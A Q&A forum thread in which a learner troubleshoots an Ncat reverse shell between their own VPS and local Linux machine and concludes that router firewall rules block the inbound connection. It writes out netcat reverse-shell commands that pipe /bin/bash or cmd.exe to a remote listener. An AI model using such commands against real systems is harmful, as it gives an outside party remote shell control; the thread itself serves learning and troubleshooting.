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Ncat reverse shell, No connection

I'm facing a problem establishing a reverse shell using the Ncat (Nmap's tool). At first it worked properly, but when I swap the target and attacking machine it doesn't.

Case 1: I set up a Ubuntu virtual private server (IP Address:, here the Ubuntu machine is my attacking machine and my local Linux machine is the target. Then I executed this command on my attacking machine:

ncat -lnv 489

Now I attempted to connect to my attacking machine from my local machine(target), so, I executed this:

ncat -e "/bin/bash" 489

by doing so the reverse shell is perfectly established.

Case 2: But here when I tried to swap my machines & listen for the target on my local machine and so by trying to connect to the attacker (my local Linux machine) from the Ubuntu machine (target) there's no connection established between them.

I'm completely new to the concept of reverse shells.

On your machine

nc -nlvp 489

On the victim machine

nc 489 –e /bin/bash

OR for Windows

nc.exe 489 –e cmd.exe

For reference: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/

It's a big blunder, that I forgot to notice my router's job.

  • Case 1: As it's a reverse shell connection my firewall is freely allowing the outbound connection, so that I could connect to the victim's machine.
  • Case 2: But when my machine is listening for the victim. And when victim try to connect to my machine, my firewall is just blocking it, as it's an inbound connection.

And the only fix that I could do is by allowing inbound connections from that particular victim's IP for that moment, by configuring my router's settings.

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